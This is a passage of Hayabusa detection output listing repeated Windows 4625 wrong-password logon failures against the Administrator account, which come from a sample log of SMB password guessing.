NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
